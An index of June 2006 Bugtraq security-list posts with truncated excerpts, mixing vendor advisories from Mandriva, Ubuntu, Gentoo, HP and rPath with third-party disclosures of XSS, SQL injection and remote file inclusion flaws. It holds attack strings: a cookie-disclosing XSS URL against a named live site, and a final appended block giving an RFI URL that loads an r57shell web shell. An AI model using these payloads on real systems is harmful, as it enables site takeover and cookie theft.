[ MDKSA-2006:105 ] - Updated kdebase packages fix local vulnerability in kdm
Date: 2006-06-15  From: security mandriva com

PHP security (or the lack thereof)
Date: 2006-06-16  From: Darren Reed (avalon caligula anu edu au)
  From my own mail archives, PHP appears to make up at least 4% of the email to bugtraq I see - or over 1000 issues since 1995, out of the 25,000 I have saved. People complain about applications like sendmail... in the same period, it has been responsible for less than 200. Do we have a new contende [...]

Cisco Secure ACS Cross Site Scripting Vulnerability.
Date: 2006-06-15  From: liam romanis uk fujitsu com
  FUJITSU SERVICES SECURITY ADVISORY
  DATE: 27-01-2006
  AUTHOR: THOMAS LIAM ROMANIS
  VENDOR: Cisco
  PRODUCT: Cisco Secure ACS
  VERSION(S) TESTED: Cisco Secure ACS version 2.3 UNIX hosted on Netscape FastTrack Server version 2.01c on Sun Solaris 8.0
  TITLE: Cisco Secure ACS LogonProxy.cgi Cross Site Sc [...]

Calendarix 0.7.20060401, SQL Injection Vulnerabilities
Date: 2006-06-15  From: Federico Fazzi (federico autistici org)
  Advisory id: FSA:018
  Author: Federico Fazzi
  Date: 15/06/2006, 23:36
  Synthesis: Calendarix 0.7.20060401, SQL Injection Vulnerabilities
  Type: low
  Product: http://www.calendarix.com/
  Patch: unavailable [...]

Carspace.com - XSS with cookie disclosure
Date: 2006-06-15  From: luny youfucktard com
  Carspace.com
  Homepage: http://www.carspace.com
  Affected files: Input boxes of registering, Login boxes, sending mail input boxes, Searching for photos.
  XSS vuln with cookie disclosure via ErrorMessage when registering: http://www.carspace.com/?register@@!ErrorMessage=<br><SCRIPT SRC=htt [...]

Ji-takz Chat (mycfg) Remote File Inclusion
Date: 2006-06-16  From: SpC-x Bsdmail Org
  # Ji-takz Chat (mycfg) Remote File Inclusion
  # Credit : SpC-x
  # Site : http://wWw.SaVSaK.CoM
  # Greetz : # | Liz0ziM | Ejder | Fa [...]

Re: [FSA016] ISPConfig 2.2.3, File inclusion vulnerability
Date: 2006-06-16  From: t brehm ispconfig org
  Thank you for posting your ISPConfig code review. The posted proof of concept exploit does not affect any ISPConfig installation. Explanation: There is one thing that you did not take into account while reviewing the sources: You reviewed the installation tarball that is not identical with [...]

Re: Several flaws in e-business designer (eBD)
Date: 2006-06-16  From: ebd soporte oasyssoft com
  A bug in the eBD HTML editor has been discovered. It will allow a user to modify the images of the /imgfiles folder (the files raised in the option resources > images). Oasyssoft, the producer, has installed the patch in all our servers, so all MyeBD users are updated since the end of May.

Develooping Flash Chat (banned_file) Remote File Inclusion
Date: 2006-06-16  From: SpC-x Bsdmail Org
  # Develooping Flash Chat (banned_file) Remote File Inclusion
  # Credit : SpC-x
  # Site : http://wWw.SaVSaK.CoM
  # Greetz : # | Liz0 [...]

Indexu v 5.0.01 Multiple Remote File Include Vulnerabilities
Date: 2006-06-16  From: KARKOR23 hotmail com
  Discovered By CrAsh_oVeR_rIdE
  indexu remote file include
  site of script: http://www.nicecoder.com/
  Vulnerable: INDEXU v5.0.1
  file include: include($admin_template_path."msg.php"); admin_template_path p [...]

[USN-303-1] MySQL vulnerability
Date: 2006-06-16  From: Martin Pitt (martin pitt canonical com)
  Ubuntu Security Notice USN-303-1, June 16, 2006
  mysql-dfsg-4.1, mysql-dfsg-5.0 vulnerability
  CVE-2006-2753
  A security issue affects the following Ubuntu releases: Ub [...]

dvdwolf SQL injection/XSS
Date: 2006-06-16  From: CrAzY CrAcKeR hotmail com
  Discovered By: CrAzY CrAcKeR
  Site: www.alshmokh.com
  I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r
  Example:- /templates/dsp_movie.php [...]

aXentForum II XSS vuLLn
Date: 2006-06-16  From: SnoBmsn hotmail de
  vendor: http://www.axent.us/axentforum.cfm
  affected versions: aXentForum II and prior
  aXentForum II contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "startrow" parameter in "viewposts.cfm" isn't properly sanitised before being returned to the user. This can be [...]

[security bulletin] HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS)
Date: 2006-06-16  From: security-alert hp com
  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  SUPPORT COMMUNICATION - SECURITY BULLETIN
  Document ID: c00657001
  Version: 1
  HPSBUX02115 SSRT061077 rev.1 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS)
  NOTICE: The information in this Security Bulletin should b [...]

rPSA-2006-0105-1 arts
Date: 2006-06-15  From: Justin M. Forbes (jmforbes rpath com)
  rPath Security Advisory: 2006-0105-1
  Published: 2006-06-15
  Products: rPath Linux 1
  Rating: Minor
  Exposure Level Classification: Local Root Non-deterministic Privilege Escalation
  Updated Versions: arts=/conary.rpath.com@rpl:devel//1/1.4.2-1.4-1
  References: http://www.cve.mitre.org/cgi-bi [...]

HotPlugCMS 1.0, Cross-Site Scripting Vulnerabilities
Date: 2006-06-15  From: Federico Fazzi (federico autistici org)
  Advisory id: FSA:017
  Author: Federico Fazzi
  Date: 15/06/2006, 20:31
  Synthesis: HotPlugCMS 1.0, Cross-Site Scripting Vulnerabilities
  Type: low
  Product: http://hotplugcms.com/
  Patch: unavailable [...]

rPSA-2006-0106-1 kdebase
Date: 2006-06-15  From: Justin M. Forbes (jmforbes rpath com)
  rPath Security Advisory: 2006-0106-1
  Published: 2006-06-15
  Products: rPath Linux 1
  Rating: Major
  Exposure Level Classification: Local Root Deterministic Information Exposure
  Updated Versions: kdebase=/conary.rpath.com@rpl:devel//1/3.4.2-3.11-1
  References: http://www.cve.mitre.org/cgi-bi [...]

[ GLSA 200606-19 ] Sendmail: Denial of Service
Date: 2006-06-15  From: Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Regarding "SMB Invalid Handle Value" - MS06-030. Vulnerability not fixed.
Date: 2006-06-15  From: Reversemode (advisories reversemode com)
  Hi, Just to confirm that Microsoft has not fixed the NtClose/ZwClose DeadLock vulnerability. The bulletin MS06-030 addressed this flaw as "SMB Invalid Handle Value" which is just a euphemism from my point of view. The code added to mrxsmb.sys is just a wrapper in order to avoid the "Invalid Ha [...]

[ GLSA 200606-17 ] OpenLDAP: Buffer overflow
Date: 2006-06-15  From: Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200606-18 ] PAM-MySQL: Multiple vulnerabilities
Date: 2006-06-15  From: Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[USN-297-2] Thunderbird extensions update for recent security update
Date: 2006-06-15  From: Martin Pitt (martin pitt canonical com)
  Ubuntu Security Notice USN-297-2, June 15, 2006
  mozilla-thunderbird, thunderbird-quickfile updates
  A security issue affects the following Ubuntu releases: Ubuntu 6.0 [...]

Andys Chat 4.5 (action) Remote File Inclusion
Date: 2006-06-15  From: SpC-x Bsdmail Org
  # Andys Chat 4.5 (action) Remote File Inclusion
  # Credit : SpC-x
  # Site : http://wWw.SaVSaK.CoM
  # Greetz : # | Liz0ziM | Ejder | [...]
script type : mcGuestbook 1.3
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
admin.php
http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt?
ecr